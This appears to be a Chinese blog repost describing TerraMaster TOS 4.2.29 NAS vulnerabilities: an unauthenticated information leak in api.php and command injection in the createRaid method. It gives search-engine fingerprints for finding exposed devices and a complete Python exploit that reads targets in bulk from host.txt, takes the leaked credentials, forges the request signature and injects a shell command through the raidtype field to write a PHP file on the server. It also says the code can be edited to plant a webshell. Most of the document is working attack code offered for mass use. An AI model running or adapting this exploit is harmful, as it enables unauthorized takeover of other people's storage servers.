Terramaster TOS是中国铁威马(Terramaster)公司的一款基于Linux平台的,专用于erraMaster云存储NAS服务器的操作系统。 Terramaster TOS 4.2.29版本存在命令注入漏洞,该漏洞源于api.php脚本中的webNasIPS 组件中的输入验证不正确。未经身份验证的攻击者可以发送特殊数据利用该漏洞并在目标系统上执行任意命令。 TerraMaster TOS mobile.class.php文件的createRaid方法存在远程命令执行漏洞 ,攻击者配合 CVE-2022-24990漏洞可以获取服务器权限
TOS 版本 4.2.29
关键词:body="TOS Loading" && title!="- CoreAPI" "TerraMaster" && header="TOS"
github已有poc
poc如下:
import time, requests,re,hashlib,json def title(): print(''' iiii tttt i::::i ttt:::t iiii t:::::t t:::::t ppppp ppppppppp aaaaaaaaaaaaa iiiiiii nnnn nnnnnnnn ttttttt:::::ttttttt eeeeeeeeeeee rrrrr rrrrrrrrr p:::::::::::::::::p aaaaaaaaa:::::a i::::i n::::::::::::::nn t:::::::::::::::::t e::::::eeeee:::::eer:::::::::::::::::r pp::::::ppppp::::::p a::::a i::::i nn:::::::::::::::ntttttt:::::::tttttt e::::::e e:::::err::::::rrrrr::::::r p:::::p p:::::p aaaaaaa:::::a i::::i n:::::nnnn:::::n t:::::t e:::::::eeeee::::::e r:::::r r:::::r p:::::p p:::::p aa::::::::::::a i::::i n::::n n::::n t:::::t e:::::::::::::::::e r:::::r rrrrrrr p:::::p p:::::p a::::aaaa::::::a i::::i n::::n n::::n t:::::t e::::::eeeeeeeeeee r:::::r p:::::p p::::::pa::::a a:::::a i::::i n::::n n::::n t:::::t tttttte:::::::e r:::::r p:::::ppppp:::::::pa::::a a:::::a i::::::i n::::n n::::n t::::::tttt:::::te::::::::e r:::::r p::::::::::::::::p a:::::aaaa::::::a i::::::i n::::n n::::n tt::::::::::::::t e::::::::eeeeeeee r:::::r p::::::pppppppp aaaaaaaaaa aaaaiiiiiiii nnnnnn nnnnnn ttttttttttt eeeeeeeeeeeeee rrrrrrr p:::::p p:::::::p p:::::::p p:::::::p What is black and what is white ppppppppp blog: https://www.cnblogs.com/painter-sec Team: base64 安全团队 ''') def usage(): print(""" 用法:python3 TerraMaster TOS 信息泄露漏洞+RCE.py 前提:在脚本所在文件夹下放入:host.txt 目标 """) def poc_getinfo(target): print("[+]正则检测:{}".format(target)) headers = {"User-Agent": "TNAS"} payload = target + "/module/api.php?mobile/webNasIPS" try: req = requests.get(url=payload, headers=headers).content.decode("utf-8") if "successful" in req: print("[+]存在信息泄露漏洞:{}".format(payload)) print(' [-]泄露信息:' + req) with open("poc1_vul.txt", "a+", encoding="utf-8") as f: f.write(payload + '\n') poc_execute(req,target) except: pass def poc_execute(req,target): print("[+]开始进行命令执行检测---") req = str(req) mac = str(re.findall(r"ADDR:(.*?)\\", req)[0][-6:]) authorization = re.findall(r"PWD:(.*?)\\", req)[0] timestamp = str(int(time.time())) signature = hashlib.md5((mac + timestamp).encode("utf-8")).hexdigest() data = {"raidtype": ';echo "<?php phpinfo();?>">vuln1.php', "diskstring": "XXXX"} headers = {"Authorization": authorization, "Signature": signature, "Timestamp": timestamp, "User-Agent": "TNAS"} payload = target+ '/module/api.php?mobile/createRaid' req2 = requests.post(url=payload,headers=headers,data=data).content.decode("utf-8") if "successful" in req2: print("[+]命令执行成功,成功写入phpinfo文件,文件地址:{}".format(target+'/module/vuln1.php')) if __name__ == '__main__': title() usage() with open("host.txt", 'r', encoding="utf-8") as f: temp = f.readlines() for target in temp: # 此处也可以遍历url文件 target = target.strip().rstrip("/") poc_getinfo(target)
再将批量url放入host.txt 直接执行命令 python3 poc.py 即可看到结果,有漏洞url会保存在poc1_vul.txt
并查看写入的php文件
如果写入webshell请自行修改代码
原文链接:https://blog.csdn.net/weixin_43080961/article/details/125134569?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522171828022116800180643007%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=171828022116800180643007&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~times_rank-4-125134569-null-null.nonecase&utm_term=nas+%E9%93%81%E5%A8%81%E9%A9%AC